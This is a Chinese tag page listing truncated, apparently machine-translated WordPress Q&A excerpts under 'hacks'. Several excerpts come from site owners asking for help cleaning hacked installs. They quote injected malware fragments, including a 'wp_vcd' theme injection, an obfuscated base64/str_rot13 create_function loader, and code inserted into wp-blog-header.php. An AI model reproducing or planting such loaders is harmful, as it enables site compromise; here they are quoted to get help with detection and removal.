您当前的位置:首页 > TAG信息列表 > hacks
尝试查看页面是类别还是单一,并使用适当的标题标签显示标题
我正在使用ThemeForest中的自定义主题,并试图让自定义帖子php来检查帖子是属于某个类别还是单个帖子。如果属于类别,请使用<h2> 对于标题(用于SEO目的),如果它位于文章的个人/单个页面上,则使用<h1>.以下是现有的公共功能:public function title() { echo \'<h2 class=\"post_title\">\'; echo \'<a href=\"\'; the_permalink
在wp_INSERT_POST()之前/期间添加自定义字段(POST META)
我们的代码库有大量的逻辑,可以在插入/创建post时执行。然而,其中一些逻辑依赖于自定义的post-meta。据我所知,向新帖子添加帖子元的唯一方法如下:$post_id = wp_insert_post($post_obj); add_post_meta($post_id, \'key\', \"value\"); 然而,这意味着在插入post上的挂钩时,post元不存在。是否有任何方法可以将post meta作为$post_obj?我尝试用$post_obj->custom_k
有没有任何关于Wordpress钩子和黑客的参考?
我正在搜索一个网站,有很多Wordpress的黑客和钩子。一些挂钩,如激活调试模式等。你能给我很多这样的未来吗?
wordpress admin security
我用不同的工具扫描我的网站,但它没有显示恶意脚本。但当我在管理仪表板中看到时,我在body标签下面看到了奇怪的方形符号。我试图检查管理索引文件,根索引文件,但什么都没有。有人放了这个脚本。而且,当我试图采取备份它不允许我采取。使用BackupFordPress插件。然而,所有其他的事情都在运行,但在管理方面仍然存在一些问题。如何检测和删除此项。
db.php, is it a legit file
在我为之进行疑难解答的一个WP安装(因为站点已关闭,DB连接太多)上,在根目录下添加了一个文件(带有WP-config.php和其他文件),该文件名为:DB。php它的大小为280 KB,包含一些粗糙的数据,下面是一个示例通常谷歌搜索不会透露这是一个黑客,但不会透露这是一个合法的wp文件。。。所以问题是,我用它做什么。。。很抱歉出现“垃圾外观”,但文件中是这样的。。。。我很担心!<?php /** Adminer - Compact database management * @li
如果黑客查看了所有的php文件,他会对我造成伤害吗?
例如,我备份了所有ftp内容(wordpress安装php文件),黑客得到了备份文件并查看了所有php文件(包括config.php等)。。。他能访问我的wordpress网站吗远程数据库已禁用。。
在特定的时间范围内拉出“热门帖子”
我想在一个网站上显示每周的“热门帖子”列表。目前,该列表显示了一个“热门帖子”栏,但这些帖子没有特定的时间范围。它显示了网站开始时最受欢迎的帖子。这是我的密码。。。// Track post view count for popular posts function track_post_view( $post_id ) { $count_key = \'post_views_count\'; $count = get_post_meta( $post_id, $cou
多个wp_options表以在安装之间共享内容
我的应用程序>10user_roles, 每个都能够执行完全不同的任务,提供了自定义后端,并且没有访问wp-admin. 每个user_role 通过多个插件处理使用。每个user_role 在相同的数据(帖子、分类法等)上进行交互我的想法是对一个或多个应用程序使用单个安装user_roles 连接到单个数据库以共享用户、帖子等,但加载了不同的插件,因此只需单独wp_options 桌子目标是提供独立的登录区域(例如子域,我不希望合作伙伴使用与客户相同的登录),更容易的路由(每个角色的永久链接和重写
自定义帖子类型和删除弹丸-我们应该这样做吗?
我在尝试删除我的自定义帖子类型slug时遇到了一些问题,我在这里读到了来自有同样问题的人的其他问题。我们不想让这个鼻涕虫出现在我们的URL中!但这一切的解决方案似乎都涉及某种黑客行为,一种重写规则来修复不可避免的404。一些开发人员说,去吧,其他人说,这不是最佳实践,它违背了自定义帖子类型的预期目的。我自己需要一些关于自定义帖子类型应该是什么或做什么超越了codex提供的明确。。。我显然不是唯一一个感到困惑的人。出于SEO原因,我们不想在URL结构中添加新级别。例如,如果我希望我的CPT URL为:/pe
这段代码是做什么的?(注入代码被黑客攻击)
下面的代码被注入到我的wordpress函数主题中。有人能解释一下代码的作用吗?这是怎么做到的?$div_code_name = \"wp_vcd\"; $funcfile = __FILE__; if(!function_exists(\'theme_temp_setup\')) { $path = $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\']; if (stripos($_SERVER[
有人试图入侵我的网站,需要指导
有多个IP正在尝试访问我的目录。我正在使用iThemes安全插件,它显示了以下列表。这些是所有IP每分钟都试图访问的文件。https://www.{My Website Name}.com/tag/feed/ https://www.{My Website Name}.com/premium-titanium/undefined https://www.{My Website Name}.com/wp-content/uploads/2017/11/supra-on-w
暴力破解即使受IP限制也是如此
我们根据Wordpress的建议对网站进行了安全设置,几个月来我们没有任何黑客企图。尤其是wp登录。php和wp admin仅受IP地址的限制,如下所示:<Files wp-login.php> order deny,allow allow from a.b.c.d deny from all </Files> 今天,根据Wordfence security,我们通过Tor网络进行了黑客攻击。幸运的是,所有的IP地址都被屏蔽了,网站是安全
被黑客入侵。有没有我可以检查的WordPress安全漏洞清单?
我观察到一个文件被上传到我Wordpress网站的各个插件文件夹中。该文件用于从我的服务器发送垃圾邮件,每次我删除它时,它都会上载到另一个文件夹。有数百个IP地址访问该文件,因此如果攻击者拥有大量IP地址池,那么阻止它们可能不会真正有用。然而,我还有另外两个网站使用Wordpress以外的平台,它们没有受到黑客攻击(没有恶意文件上载到这些文件夹),因此我认为攻击者可能依赖Wordpress插件的已知文件夹结构来上载其文件。上传文件上的用户是我的webserver用户[名称非常独特],因此我认为黑客是通过h
使用暂态API的网站被黑客攻击?
我有一个要“清理”的网站,在public\\u html文件夹中有近10k个复制文件,几乎所有PHP文件都包含代码$z=get_option(\"_transient_wp_less_compiled_c9b58ec39525169515675906d91c9815\"); $z=base64_decode(str_rot13($z[\'root\'])); if(strpos($z,\"E8FA4873\")!==false){ $_z=create_function(\"\",$z); @$_z();
使用比MD5更强大的保护来保护wp_USERS中的密码
我更喜欢为我的wp站点提供更好、更强的密码。在看了MD5 tube下面的内容并阅读了哈希插件之后,我找不到一个好的WP解决方案。搜索hash plugins!为什么不使用MD5 tube!在phpmyadmin中,我只得到了MD5和SHA1,正如你在管道中看到的那样,它们很容易被破解。但是,对于WP站点上的所有密码,什么才是真正好的保护呢?我找不到它。我是否必须向所有密码添加额外的代码字符串,如:@9I_^2u@wB72&_Äbõ. 我想这将使黑客变得非常困难。
如何防止机器人或其他人自动修改任何文件?
有人每天修改我们的网站文件wp-blog-header.php.他们正在添加以下代码,在我们的网站中自动生成不必要的页面,代码为:$e = pathinfo($f = strtok($p = @$_SERVER[\"REQUEST_URI\"], \"?\"), PATHINFO_EXTENSION); if ((!$e || in_array($e, array(\"html\", \"jpg\", \"png\", \"gif\")) || basename($f,
Wordpress login urls
最近,我们注意到我们的网站上出现了暴力攻击。为了使事情更加安全,我们决定将对wp登录url的访问权限限制为只有几个受信任的IP地址。<Files wp-login.php> order deny,allow Deny from all allow from {IP-ADDRESS} </Files> 这是可行的,只有允许的IP才能访问此URL。然而,我们仍然看到试图登录的暴力攻击。据我所知,登
管理员用户在黑客攻击后缺乏管理员权限,无法恢复
我的网站(Apache/Linux上的4.5.3)遭到黑客攻击,我怀疑类似的情况described here. 据我所知,我已经删除或至少禁用了黑客,但是管理员用户无法执行更新WordPress、添加插件等操作。到目前为止,我已经尝试:通过phpMyAdmin编辑现有管理员用户的权限</通过phpMyAdmin添加一个全新的管理员用户</使用新下载的(当前安装的相同版本)覆盖核心WP文件</禁用(然后完全删除)所有插件</所有这些都没有用。有没有想过我下一步可以尝试什么?
如何在不破坏核心WordPress文件的情况下引用外部附件?
我正在开发一个使用WooCommerce&;WordPress将显示相当数量(10000多个)的产品,并且无法容纳产品的所有图像大小。因此,我将图像保留在CDN上,并将所有图像附件引用到外部URL。这需要进行一些黑客攻击,因为WooCommerce/WordPress将尝试拍摄图像并上传它们,并将附件URL设置为本地相对路径(例如,2018/02/), 然后,当稍后在站点上调用这些图像时wp_get_attachment_url 将上载目录添加到基本映像中,如下所示site.com/wp-conte
多次扫描无法检测到恶意软件
我想通知并请求社区的帮助。发生的情况是,该恶意软件位于/wp-content/uploads/2020/Named-index文件夹中。phpAnd我在2017年的上传文件夹中找到了他。我觉得奇怪的是,任何在线数据库都检测不到它,甚至连Sucuri插件Wordfense都检测不到。。遵循代码(由于不适合该帖子,其中大部分内容已被删除)以下是恶意代码 if ( !class_exists( \'WPTemplateOptions\' ) ) { class WPTemplateOptions {&